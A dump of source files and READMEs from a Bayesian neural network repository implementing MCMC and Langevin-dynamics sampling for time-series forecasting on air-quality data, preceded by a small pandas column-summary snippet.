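from pandas.api.types import is_float_dtype, is_integer_dtype

def summarise_column(df: pd.DataFrame, name: str) -> tuple:
    """Return (name, type label, missing %, min, mean, max) for one column."""
    col = df[name]
    napercent = round(100 * col.isna().sum() / len(df), 3)
    if is_float_dtype(col):
        valtype = "Real"
    elif is_integer_dtype(col):
        valtype = "Int"
    else:
        return (name, "Char", napercent, "-", "-", "-")
    return (name, valtype, napercent,
            round(col.min(), 3), round(col.mean(), 3), round(col.max(), 3))

df = pd.DataFrame({"pm2.5": [1.5, np.nan, 3.0], "station": ["a", "b", "c"]})
print(summarise_column(df, "pm2.5"))    # ('pm2.5', 'Real', 33.333, 1.5, 2.25, 3.0)
print(summarise_column(df, "station"))  # ('station', 'Char', 0.0, '-', '-', '-')
```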
{
"alpha_fraction": 0.7874369025230408,
"alphanum_fraction": 0.7874369025230408,
"avg_line_length": 45.81578826904297,
"blob_id": "c7ef233856c691d5ca6986e4a66cea8832877ac1",
"content_id": "38dc06d9617225dec948e63d73b9a88dffb0c1bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1783,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 38,
"path": "/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Bayesian Neural Networks\n========================\n \nThis goal of this project is to allow experimentation with different neural network structures\nand variations on the MCMC sampling procedure.\n\n[Inital code based on the MCMC FFN Project by Rohit](https://github.com/rohitash-chandra/MCMC_fnn_timeseries)\n\n\n# Usage\n\nThe [experiments](experiments) folder contains a bunch of examples of how to train and evaluate models on several\ndatasets. Note that you will need to acquire the raw data and run the processing if you want to change the nature \nof those datasets.\n\nThese scripts will execute the python command line program [train_bn_mcmc.py](train_bn_mcmc.py)\n\nIt expects to be given a training and testing data set, and it expects the data to be a CSV file\nin which the first <INPUT NODES> number of columns are the numerical input features for the model.\nAnd the final <OUTPUT NODES> number of columns contain the target values.\n\nThe value of <MODEL> determines the overall network architecture, and <DEPTH> only applies if\nit is a deep neural network. The value of <OUTPUT ACTIVATION> determines what the activation function\nwill be and you need to choose this depending on the distribution of your target value.\n\n\n# TODO\n \n* The above method of describing the neural network structure is cumbersome and inflexible. I plan to make this driven \n by a single regular expression style syntax that describes the entire architecture.\n\n# CURRENT WORK \n\nI am extracting aspects of the MCMC and Metropolis Hastings calculations that are specific to the\nneural network architecture and embedding them in the specific neural network classes. \n\nThis will make the overall MCMC class very abstract/general and I can then easily run multiple \narchitectures side-by-side for comparison.\n\n\n\n\n"
},
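The README above describes the expected file layout only in prose. A minimal sketch of that layout: a whitespace-delimited matrix with the feature columns first and the target columns last, as read back by `np.loadtxt` in `train_bn_mcmc.py`. The file name and sizes here are hypothetical:

```python
import numpy as np

input_nodes, output_nodes, rows = 4, 1, 10   # hypothetical sizes

# Features first, then targets, as one whitespace-delimited matrix.
X = np.random.rand(rows, input_nodes)
y = np.random.rand(rows, output_nodes)
np.savetxt("toy_train.csv", np.hstack([X, y]))   # np.loadtxt can read this back

loaded = np.loadtxt("toy_train.csv")
assert loaded.shape[1] == input_nodes + output_nodes
features, targets = loaded[:, :input_nodes], loaded[:, input_nodes:]
```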
{
"alpha_fraction": 0.5283995866775513,
"alphanum_fraction": 0.5327430963516235,
"avg_line_length": 51.955753326416016,
"blob_id": "17a861972aba9df911830b87026f6b80e62139d7",
"content_id": "7e20fedaee63a4e88b211d39cadd2e3b35a9b2e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5986,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 113,
"path": "/src/LangevinNeuralNetwork.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport numpy as np\nimport random\nimport time\nimport math\nfrom NeuralNetwork import NeuralNetwork\n\n#-------------------------------------------------------------------------------\n# DEFINE A LANGEVIN NEURAL NETWORK BASE CLASS \n# WE EXTEND FROM THE STANDARD NEURAL NETWORK BUT CHANGE SOME OF THE MCMC FUNCTION\n# DEFINTIONS AND SIGNATURES\n#-------------------------------------------------------------------------------\nclass LangevinNeuralNetwork(NeuralNetwork):\n\n\n # THESE PARAMETERS CONTROL THE GRADIENT DESCENT PROCESS\n lrate = 0.0001;\n\n use_batch = False\n\n ######################################################################\n # CONSTRUCTOR\n ######################################################################\n def __init__(self, input, output, output_act, eval_metric):\n NeuralNetwork.__init__(self, input, output, output_act, eval_metric)\n\n\n ######################################################################\n # INITALISE THE DIAGONAL COVANRIANCE MATRIX FOR CALCULATING THE \n # PROBABILITY OF PROPOSAL TRANSITIONS - NEEDED FOR GRADIENT DESCENT\n # MCMC \n ######################################################################\n def initialise(self):\n self.w_size = self.get_weight_vector_length()\n # for Equation 9 in Ref [Chandra_ICONIP2017]\n self.sigma_diagmat = np.zeros((self.w_size, self.w_size))\n np.fill_diagonal(self.sigma_diagmat, self.step_w)\n\n\n #########################################################################################\n # CALCULATE LANGEVIN METROPOLIS HASTINGS ACCEPTANCE PROBABILITY - GRADIENT DESCENT + RANDOM WALK\n #----------------------------------------------------------------------------------------\n # THIS NEXT SECTION INVOLVES CALCULATING: Metropolis-Hastings Acceptance Probability for a model\n # with Langevin dynamics in the propsal generation process.\n # This will consist of the following components\n # 1) A ratio of the likelihoods (current and proposal)\n # 2) A ratio of the priors (current and proposal)\n # 3) The inverse ratio of the transition probabilities.\n ###########################################################################################################\n def calculate_metropolis_hastings_acceptance_probability( self, new_w, w_gd, new_tausq, old_w, old_tausq, data ):\n\n # WE FIRST NEED TO CALCULATE THE REVERSAL RATIO TO SATISFY DETAILED BALANCE\n # \n # Calculate a weight vector derived using gradient descent from the proposal\n w_prop_gd = self.langevin_gradient_update(data, new_w.copy())\n\n \n # THIS WAS THE VERSION USED IN THE SIMULATIONS FOR THE ORIGINAL PAPER\n # diff_prop = np.log(multivariate_normal.pdf(old_w, w_prop_gd, self.sigma_diagmat) - np.log(multivariate_normal.pdf(new_w, w_gd, sigma_diagmat)))\n ### UPDATE TO FIX NUMERICAL ISSUE\n wc_delta = (old_w - w_prop_gd)\n wp_delta = (new_w - w_gd )\n sigma_sq = self.step_w\n first = -0.5 * np.sum(wc_delta * wc_delta ) / sigma_sq # this is wc_delta.T * wc_delta /sigma_sq\n second = -0.5 * np.sum(wp_delta * wp_delta ) / sigma_sq\n diff_prop = first - second\n ### END UPDATE\n\n new_log_prior = self.get_log_prior( new_w, new_tausq)\n new_log_likelihood = self.get_log_likelihood(data, new_w, new_tausq)\n old_log_prior = self.get_log_prior( old_w, old_tausq)\n old_log_likelihood = self.get_log_likelihood(data, old_w, old_tausq)\n diff_likelihood = new_log_likelihood - old_log_likelihood\n diff_prior = new_log_prior - old_log_prior\n logproduct = diff_likelihood + diff_prior\n if logproduct > 709:\n logproduct = 709\n difference 
= math.exp(logproduct)\n mh_prob = min(1, difference)\n return mh_prob\n\n ######################################################################\n # GENERATE A PROPOSAL WEIGHT VECTOR USING GRADIENT DESCENT PLUS NOISE\n ######################################################################\n def get_proposal_weight_vector(self, data, w):\n w_gd = self.langevin_gradient_update(data, w)\n w_proposal = w_gd + np.random.normal(0, self.step_w, self.w_size)\n return w_proposal\n\n ######################################################################\n # GENERATE A PROPOSAL WEIGHT VECTOR USING GRADIENT DESCENT PLUS NOISE\n # RETURN : Tuple with the proposal and the raw gradient descent derived \n # weights\n ######################################################################\n def get_proposal_weight_vector_and_gradient(self, data, w):\n w_gd = self.langevin_gradient_update(data, w)\n w_proposal = w_gd + np.random.normal(0, self.step_w, self.w_size)\n return [w_proposal, w_gd]\n\n\n ######################################################################\n # CALCULATE EVERYTHING NEEDED FOR A SINGLE MCMC STEP\n # - PROPOSAL, PREDS, ERROR AND ACCEPTANCE PROBABILITY\n # We overwrite the definition in the Neural Network Base class because we need both the \n # proposal generation and acceptance probability to be aware of the error gradient of model.\n ###########################################################################################################\n def get_proposal_and_acceptance_probability(self, w, eta, tausq, traindata, testdata):\n [w_proposal, w_gd] = self.get_proposal_weight_vector_and_gradient(traindata, w)\n [eta_pro, tau_pro] = self.get_proposal_tau(eta)\n [pred_train, rmsetrain] = self.evaluate_proposal(traindata, w_proposal)\n [pred_test, rmsetest] = self.evaluate_proposal(testdata, w_proposal)\n mh_prob = self.calculate_metropolis_hastings_acceptance_probability(w_proposal, w_gd, tau_pro, w, tausq, traindata)\n return [w_proposal, eta_pro, tau_pro, pred_train, rmsetrain, pred_test, rmsetest, mh_prob]\n\n\n"
},
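The acceptance calculation above combines the likelihood ratio, prior ratio, and the proposal-reversal ratio in log space, capping the exponent at 709 to avoid overflow in `math.exp`. A standalone sketch of the same arithmetic on plain numpy vectors; all inputs here are hypothetical stand-ins for the class attributes and log-probability methods:

```python
import math
import numpy as np

def langevin_mh_probability(old_w, new_w, w_gd, w_prop_gd, step_w,
                            diff_likelihood, diff_prior):
    """Log-space Metropolis-Hastings ratio with the Langevin reversal term."""
    # q(old|new) / q(new|old) for isotropic Gaussian proposals of variance
    # step_w centred on the gradient-descent-updated weights.
    wc_delta = old_w - w_prop_gd
    wp_delta = new_w - w_gd
    first = -0.5 * np.sum(wc_delta ** 2) / step_w
    second = -0.5 * np.sum(wp_delta ** 2) / step_w
    diff_prop = first - second
    log_ratio = min(diff_likelihood + diff_prior + diff_prop, 709.0)
    return min(1.0, math.exp(log_ratio))

rng = np.random.default_rng(0)
w = rng.normal(size=5)
print(langevin_mh_probability(w, w + 0.01, w, w + 0.01, 0.01, -0.3, 0.0))
```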
{
"alpha_fraction": 0.7484756112098694,
"alphanum_fraction": 0.7576219439506531,
"avg_line_length": 35.38888931274414,
"blob_id": "28b93f2f56abd3e37b17f10537ececfc85a58d12",
"content_id": "5e7f8353696e9d8e43e86f6d00fefcdde0702ce3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 656,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 18,
"path": "/data/Delhi/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Delhi Air Quality TIme Series\n-----------------------------\n\nThis data was was retrieved manually in June 2019 from the Indian Government website:\n\nhttps://data.gov.in/catalog/historical-daily-ambient-air-quality-data\n\nThe API was not used because it appears to require an Indian phone number to register.\nWithout registration you are restricted to 10 rows per day using a test key.\n\n\nPreparation\n-----------\n\nThere are numerous problems with the raw data, different date formats, large missing sections\nfor certain mnonitoring stattions and irregularity in the time intervals.\n\nThe first stage of preparation happens in the file [process.py](process.py)\n\n"
},
{
"alpha_fraction": 0.6990291476249695,
"alphanum_fraction": 0.7330096960067749,
"avg_line_length": 17.636363983154297,
"blob_id": "5bc0ad1de3fedad7ffbdae4a0cf2b08cefbbf4ce",
"content_id": "9fd1a1e3895bd6bad9759e9a1525fc88d3d63f2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 11,
"path": "/experiments/RUN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n./RUN_Delhi_FFNN.sh\n./RUN_Delhi_LangevinFFNN.sh\n./RUN_Delhi_SLP.sh\n\n./RUN_BeiJing_24hr_SLP.sh\n./RUN_BeiJing_24hr_FFNN.sh\n./RUN_BeiJing_24hr_LangevinFFNN.sh\n\n./RUN_BeiJing_7day_LangevinFFNN.sh\n\n"
},
{
"alpha_fraction": 0.45648854970932007,
"alphanum_fraction": 0.4637404680252075,
"avg_line_length": 45.15858840942383,
"blob_id": "e0d79dc37c6b05e1dd4b4688211eb587496e5774",
"content_id": "3312dc8a3664ef4e8eb3524c44b5d5b59d8fa401",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10480,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 227,
"path": "/src/NeuralNetwork.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport numpy as np\nimport random\nimport time\nimport math\n\n#-------------------------------------------------------------------------------\n# DEFINE A NEURAL NETWORK BASE CLASS - FOR OTHER MODELS TO EXTEND\n#-------------------------------------------------------------------------------\nclass NeuralNetwork:\n\n # THESE PARAMETERS CONTROL THE RANDOM WALK\n # THE FIRST THE CHANGES TO THE NETWORK WEIGHTS\n step_w = 0.01;\n\n # THE SECOND THE VARIATION IN THE NOISE DISTRIBUTION\n step_eta = 0.01;\n\n # THESE VALUES CONTROL THE INVERSE GAMMA FUNCTION\n # WHICH IS WHAT WE ASSUME TAU SQUARED IS DRAWN FROM\n # THIS IS CHOSEN FOR PROPERTIES THAT COMPLIMENT WITH THE GAUSSIAN LIKELIHOOD FUNCTION\n # IS THERE A REFERENCE FOR THIS?\n nu_1 = 0\n nu_2 = 0\n\n # SIGMA SQUARED IS THE ASSUMED VARIANCE OF THE PRIOR DISTRIBUTION\n # OF ALL WEIGHTS AND BIASES IN THE NEURAL NETWORK\n sigma_squared = 25\n\n ######################################################################\n # CONSTRUCTOR\n ######################################################################\n def __init__(self, input, output, output_act, eval_metric):\n self.input = input\n self.output = output\n self.output_act = output_act\n self.eval_metric = eval_metric\n\n if output_act==\"sigmoid\":\n self.activation = self.sigmoid\n elif output_act==\"tanh\":\n self.activation = self.tanh\n elif output_act==\"relu\":\n self.activation = self.relu\n else :\n self.activation = self.linear\n\n if eval_metric==\"MAE\":\n self.eval = self.mae\n elif eval_metric==\"MAPE\":\n self.eval = self.mape\n elif eval_metric==\"MASE\":\n self.eval = self.mase\n elif eval_metric==\"MASEa\":\n self.eval = self.mase\n elif eval_metric==\"MASEb\":\n self.eval = self.maseb\n else :\n self.eval = self.rmse\n\n\n ######################################################################\n # LOCAL DEFINITION OF THE SIGMOID FUNCTION FOR CONVENIENCE\n ######################################################################\n def sigmoid(self, x):\n return 1 / (1 + np.exp(-x))\n\n ######################################################################\n # LOCAL DEFINITION OF THE TANH FUNCTION FOR CONVENIENCE\n ######################################################################\n def tanh(self, xin):\n bounder = lambda t: max(-709,min(709,t))\n x = np.array([[bounder(xi) for xi in xin[0]]])\n ex = np.exp(x)\n eminx = np.exp(-x)\n return (ex - eminx)/(ex + eminx)\n\n ######################################################################\n # RELU\n ######################################################################\n def relu(self, xin):\n bounder = lambda t: max(0,t)\n x = np.array([[bounder(xi) for xi in xin[0]]])\n return x\n\n ######################################################################\n # LINEAR ACTIVATION\n ######################################################################\n def linear(self, x):\n return x \n\n ######################################################################\n # RMSE - Root Mean Squared Error\n ######################################################################\n def rmse(self, predictions, targets, features):\n return np.sqrt(((predictions - targets) ** 2).mean())\n\n ######################################################################\n # Mean Absolute Error\n ######################################################################\n def mae(self, predictions, targets, features):\n return (np.abs(predictions - targets)).mean()\n\n 
######################################################################\n # Mean Absolute Percentage Error (with correction for zero target) \n ######################################################################\n def mape(self, predictions, targets, features):\n return (np.abs(predictions - targets)/(targets+0.0000001)).mean()\n\n ######################################################################\n # AUC - Area Under the Curve (Binary Classification Only)\n # TODO: Implement\n ######################################################################\n def auc(self, predictions, targets, features):\n #joined = \n #sorted = \n return (np.abs(predictions - targets)/(targets+0.0000001)).mean()\n\n\n ######################################################################\n # Mean Absolute Scaled Error\n # This metric make strong assumptions about the structure of the data\n # 1. We assume that the last of the presented features is the \n # NAIVE prediction. This could be the previous known value of \n # the entity we are predicting, or the SEASONAL NAIVE VALUE\n # Either way it is up to you to prepare the data this way.\n # NOTE: Adding a small value to correct for instances when\n # the base error is zero\n ############################################################################\n def mase(self, predictions, targets, features):\n naive_preds = features[:, features.shape[1]-1 ]\n naive_error = np.abs(naive_preds - targets)\n model_error = np.abs(predictions - targets)\n return model_error.sum() / ( naive_error.sum() + 0.0000001 )\n\n ######################################################################\n # Mean Absolute Scaled Error - (Time Series Only) Second Version\n # This metric make strong assumption about the test data\n # 1. That its order in the vector is the order in time\n # 2. 
That the appropriate naive model is the last target value\n # preceding the current row\n # (in other words we are predicting one time step in advance)\n # NOTE: Adding a small value to correct for instances when\n # the naive error is zero\n ######################################################################\n def mase_version2(self, predictions, targets, features):\n naive_preds = targets[0:len(targets)-1]\n naive_targs = targets[1:len(targets)]\n naive_error = np.abs(naive_preds - naive_targs)\n model_error = np.abs(predictions - targets)\n factor = len(targets) / (len(targets) - 1)\n return model_error.sum() / (factor * naive_error.sum() + 0.000001)\n\n\n ######################################################################\n # INITIALISE THE CACHES USED FOR STORING VALUES USED IN MCMC PROCESS\n ######################################################################\n def initialise_cache(self):\n self.log_likelihood_cache = {}\n self.log_prior_cache = {}\n\n ######################################################################\n # TRANSFORM A WEIGHT VECTOR INTO A KEY THAT WILL BE USED IN THE CACHE\n ######################################################################\n def get_cache_key(self, w):\n return hashlib.md5(str(w).encode('utf-8')).hexdigest()\n\n ######################################################################\n # GET METHOD FOR LOG LIKELIHOOD THAT MAKES USE OF THE CACHE\n ######################################################################\n def get_log_likelihood(self, data, w, tausq):\n tempkey = self.get_cache_key(w)\n if tempkey in self.log_likelihood_cache:\n return self.log_likelihood_cache[tempkey]\n else:\n templl = self.log_likelihood(data, w, tausq)\n self.log_likelihood_cache[tempkey] = templl\n return templl\n\n ######################################################################\n # GET METHOD FOR LOG PRIOR THAT MAKES USE OF THE CACHE\n ######################################################################\n def get_log_prior(self, w, tausq):\n tempkey = self.get_cache_key(w)\n if tempkey in self.log_prior_cache:\n return self.log_prior_cache[tempkey]\n else:\n templp = self.log_prior(w, tausq)\n self.log_prior_cache[tempkey] = templp\n return templp\n\n\n ######################################################################\n # CALCULATE EVERYTHING NEEDED FOR A SINGLE MCMC STEP \n # - PROPOSAL, PREDS, ERROR AND ACCEPTANCE PROBABILITY\n ###########################################################################################################\n def get_proposal_and_acceptance_probability(self, w, eta, tausq, traindata, testdata):\n w_proposal = self.get_proposal_weight_vector(w)\n [eta_pro, tau_pro] = self.get_proposal_tau(eta)\n [pred_train, rmsetrain] = self.evaluate_proposal(traindata, w_proposal)\n [pred_test, rmsetest] = self.evaluate_proposal(testdata, w_proposal)\n mh_prob = self.get_acceptance_probability(w_proposal, tau_pro, w, tausq, traindata)\n return [w_proposal, eta_pro, tau_pro, pred_train, rmsetrain, pred_test, rmsetest, mh_prob]\n\n ######################################################################\n # CALCULATE METROPOLIS HASTINGS ACCEPTANCE PROBABILITY - RANDOM WALK\n #----------------------------------------------------------------------------------------\n # THIS NEXT SECTION INVOLVES CALCULATING: Metropolis-Hastings Acceptance Probability\n # This is what will determine whether a given change to the model weights (a proposal)\n # is accepted or rejected\n # This will consist of the following components\n # 1) A ratio 
of the likelihoods (current and proposal)\n # 2) A ratio of the priors (current and proposal)\n ###########################################################################################################\n def calculate_metropolis_hastings_acceptance_probability(self, new_w, new_tausq, old_w, old_tausq, data ):\n new_log_prior = self.get_log_prior( new_w, new_tausq)\n new_log_likelihood = self.get_log_likelihood(data, new_w, new_tausq)\n old_log_prior = self.get_log_prior( old_w, old_tausq)\n old_log_likelihood = self.get_log_likelihood(data, old_w, old_tausq)\n diff_likelihood = new_log_likelihood - old_log_likelihood\n diff_prior = new_log_prior - old_log_prior\n logproduct = diff_likelihood + diff_prior\n if logproduct > 709:\n logproduct = 709\n difference = math.exp(logproduct)\n mh_prob = min(1, difference)\n return mh_prob\n\n\n"
},
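The `mase` metric in the record above assumes the last feature column carries the naive forecast. A tiny self-contained check of that convention, with toy numbers that are not from the repo:

```python
import numpy as np

def mase(predictions, targets, features):
    """Model MAE scaled by the MAE of the naive forecast stored in the
    final feature column; a small epsilon guards a zero naive error."""
    naive_preds = features[:, -1]
    naive_error = np.abs(naive_preds - targets)
    model_error = np.abs(predictions - targets)
    return model_error.sum() / (naive_error.sum() + 1e-7)

targets  = np.array([10.0, 12.0, 11.0])
features = np.array([[0.1,  9.0],    # last column = naive forecast
                     [0.2, 10.0],    # (e.g. the previous observed value)
                     [0.3, 12.0]])
preds = np.array([10.5, 11.5, 11.0])
print(mase(preds, targets, features))  # 1.0 / 4.0 => 0.25, beats the naive model
```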
{
"alpha_fraction": 0.47745969891548157,
"alphanum_fraction": 0.4836020767688751,
"avg_line_length": 41.793426513671875,
"blob_id": "0a40f0ffd58ac1ce1c76bda8bd94c7bdf9ae412b",
"content_id": "eea9a5f053a6cd68b4d85cc21133d18391abba30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9117,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 213,
"path": "/src/DeepFFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport time\nimport math\nfrom NeuralNetwork import NeuralNetwork\n\n#-------------------------------------------------------------------------------\n# DEFINE A DEEP NEURAL NETWORK CLASS\n# WITH THE ARCHITECTURE WE REQUIRE\n# AND METHODS THAT MAKE IT AMENABLE TO BAYESIAN ML PROCESSES\n#-------------------------------------------------------------------------------\nclass DeepFFNN(NeuralNetwork):\n\n def __init__(self, input, hidden, output, max_depth, output_act, eval_metric):\n\n self.hidden = hidden\n self.max_depth = max_depth\n NeuralNetwork.__init__(self, input, output, output_act, eval_metric)\n\n self.w_size = self.get_weight_vector_length()\n\n self.initialise_cache()\n\n # WEIGHTS FROM INPUT TO FIRST HIDDEN LAYER \n self.W1 = np.random.randn(self.input, self.hidden) / np.sqrt(self.input)\n self.B1 = np.random.randn(1, self.hidden) / np.sqrt(self.hidden)\n\n # WEIGHTS FROM LAST HIDDEN LAYER TO OUTPUT LAYER \n self.W2 = np.random.randn(self.hidden, self.output) / np.sqrt(self.hidden)\n self.B2 = np.random.randn(1, self.output) / np.sqrt(self.hidden) \n\n self.out = np.zeros((1, self.output)) # output layer for base model\n\n # NOW LETS CREATE ALL OF THE HIDDEN LAYERS\n self.h_weights = []\n self.h_biases = []\n self.h_out = []\n for layer in range(self.max_depth):\n self.h_weights.append(np.random.randn(self.hidden, self.hidden) / np.sqrt(self.hidden))\n self.h_biases.append(np.random.randn(1, self.hidden) / np.sqrt(self.hidden) )\n self.h_out.append(np.zeros((1, self.hidden)) )\n\n self.final_out = np.zeros((1, self.output)) # Final output for the model\n\n ######################################################################\n # PRINT THE ARCHITECTURE\n ######################################################################\n def print(self):\n print(\"Bayesian Deep Feed Forward Neural Network\")\n print(\"Input Nodes:\", self.input)\n print(\"Hidden Nodes:\", self.hidden)\n print(\"Hidden Layers:\", self.max_depth)\n print(\"Output Nodes:\", self.output)\n\n\n\n ######################################################################\n # PASS DATA X THROUGH THE NETWORK TO PRODUCE AN OUTPUT\n ######################################################################\n def forward_pass(self, X):\n # INPUT LAYER FIRST\n z1 = X.dot(self.W1) - self.B1\n # OUTPUT OF THE FIRST HIDDEN NODES\n tempout = self.sigmoid(z1) \n # NOW THE ADDITIONAL HIDDEN LAYERS\n for layer in range(self.max_depth):\n tempz1 = tempout.dot(self.h_weights[layer]) - self.h_biases[layer]\n tempout = self.sigmoid(tempz1)\n self.h_out[layer] = tempout\n z2 = tempout.dot(self.W2) - self.B2\n self.out = self.sigmoid(z2)\n self.final_out = self.out\n return self.final_out\n\n ######################################################################\n # TAKE A SINGLE VECTOR OF FLOATING POINT NUMBERS AND USE IT TO \n # SET THE VALUES OF ALL WEIGHTS AND BIASES\n ######################################################################\n def decode(self, w):\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n internal_layer_wts = self.hidden * self.hidden\n\n start_index = 0\n w_layer1 = w[start_index:input_layer_wts]\n self.W1 = np.reshape(w_layer1, (self.input, self.hidden))\n start_index = start_index + input_layer_wts\n\n self.B1 = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n w_layer2 = w[start_index: start_index + output_layer_wts]\n self.W2 = np.reshape(w_layer2, (self.hidden, self.output))\n 
start_index = start_index + output_layer_wts\n\n self.B2 = w[start_index:start_index + self.output]\n start_index = start_index + self.output\n\n # ALL OF THE ADDITIONAL HIDDEN LAYER WEIGHTS AT THE END OF THE VECTOR \n for layer in range(self.max_depth):\n w_layer_temp = w[start_index: start_index + internal_layer_wts]\n self.h_weights[layer] = np.reshape(w_layer_temp, (self.hidden, self.hidden))\n start_index = start_index + internal_layer_wts\n self.h_biases[layer] = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n\n ######################################################################\n # PROCESS DATA\n # RUN A NUMBER OF EXAMPLES THROUGH THE NETWORK AND RETURN PREDICTIONS\n ######################################################################\n def process_data(self, data): \n size = data.shape[0]\n Input = np.zeros((1, self.input)) # temp hold input\n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n for pat in range(0, size):\n Input[:] = data[pat, 0:self.input]\n Desired[:] = data[pat, self.input:]\n self.forward_pass(Input)\n fx[pat] = self.final_out\n return fx\n\n\n ######################################################################\n # EVALUATE PROPOSAL\n # THIS METHOD NEEDS TO SET THE WEIGHT PARAMETERS\n # THEN PASS THE SET OF DATA THROUGH THE NETWORK AND\n # FINALLY CALCULATING THE RMSE\n ######################################################################\n def evaluate_proposal(self, data, w):\n self.decode(w)\n fx = self.process_data(data)\n y = data[:, self.input]\n feats = data[:, :self.input]\n metric = self.eval(fx, y, feats)\n return [fx, metric]\n\n\n ######################################################################\n # LOG LIKELIHOOD\n # CALCULATED GIVEN\n # - A PROPOSED SET OF WEIGHTS\n # - A DATA SET\n # - AND THE PARAMETERS FOR THE ERROR DISTRIBUTION\n ######################################################################\n def log_likelihood(self, data, w, tausq):\n y = data[:, self.input]\n [fx, rmse] = self.evaluate_proposal(data, w)\n loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq\n return np.sum(loss)\n\n\n ######################################################################\n # LOG PRIOR\n ######################################################################\n def log_prior(self, w, tausq):\n h = self.hidden # number hidden neurons in each layer.\n tot_h = h * (self.max_depth+1)\n d = self.input # number input neurons\n part1 = -1 * ((d * tot_h + tot_h + 2) / 2) * np.log(self.sigma_squared)\n part2 = 1 / (2 * self.sigma_squared) * (sum(np.square(w)))\n logp = part1 - part2 - (1 + self.nu_1) * np.log(tausq) - (self.nu_2 / tausq)\n return logp\n\n\n ######################################################################\n # GET THE COMPLETE LENGTH OF THE ENCODED WEIGHT VECTOR\n ######################################################################\n def get_weight_vector_length(self):\n start_index = 0\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n internal_layer_wts = self.hidden * self.hidden\n start_index = start_index + input_layer_wts\n start_index = start_index + self.hidden\n start_index = start_index + output_layer_wts\n start_index = start_index + self.output\n for layer in range(self.max_depth):\n start_index = start_index + internal_layer_wts\n start_index = start_index + self.hidden\n return start_index\n\n\n ######################################################################\n # GET NEW PROPOSAL WEIGHT VECTOR 
BY MODIFYING AN EXISTING ONE\n ######################################################################\n def get_proposal_weight_vector(self, w):\n w_proposal = w + np.random.normal(0, self.step_w, self.w_size)\n return w_proposal\n\n ######################################################################\n # GET PROPOSAL TAU VALUE FOR ERROR DISTRIBUTION\n ######################################################################\n def get_proposal_tau(self, eta):\n eta_pro = eta + np.random.normal(0, self.step_eta, 1)\n tau_pro = math.exp(eta_pro)\n return [eta_pro, tau_pro]\n\n\n ######################################################################\n # ACCEPTANCE PROBABILITY - METROPOLIS HASTINGS\n ######################################################################\n def get_acceptance_probability(self, new_w, new_tausq, old_w, old_tausq, data ):\n return self.calculate_metropolis_hastings_acceptance_probability(new_w, new_tausq, old_w, old_tausq, data)\n\n ######################################################################\n # GET THE WEIGHT VECTOR\n ######################################################################\n def get_weight_vector(self):\n mytemp = [get_weight_vector_length()]\n # TODO\n return mytemp\n\n\n"
},
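`get_weight_vector_length` in the record above just accumulates the sizes of each block of the flattened weight vector; the closed form is input·hidden + hidden + hidden·output + output + depth·(hidden² + hidden). A quick numeric cross-check against the Beijing DeepFFNN run (28 inputs, 5 hidden, 1 output, depth 3, per the experiment script above); the function name is my own:

```python
def deep_ffnn_weight_count(n_in, n_hidden, n_out, depth):
    """Length of the flat weight vector decoded by DeepFFNN.decode()."""
    input_block = n_in * n_hidden + n_hidden                  # W1 + B1
    output_block = n_hidden * n_out + n_out                   # W2 + B2
    hidden_block = depth * (n_hidden * n_hidden + n_hidden)   # extra layers
    return input_block + output_block + hidden_block

print(deep_ffnn_weight_count(28, 5, 1, 3))  # 145 + 6 + 90 = 241
```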
{
"alpha_fraction": 0.6191467046737671,
"alphanum_fraction": 0.6722164154052734,
"avg_line_length": 67.57142639160156,
"blob_id": "050aa95efafcaac46b76c16f18dbe14795df6613",
"content_id": "3e7b2010b97434b380a126a292fbe5193ac03b69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 961,
"license_type": "no_license",
"max_line_length": 303,
"num_lines": 14,
"path": "/experiments/RUN_BeiJing_24hr_SLP.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
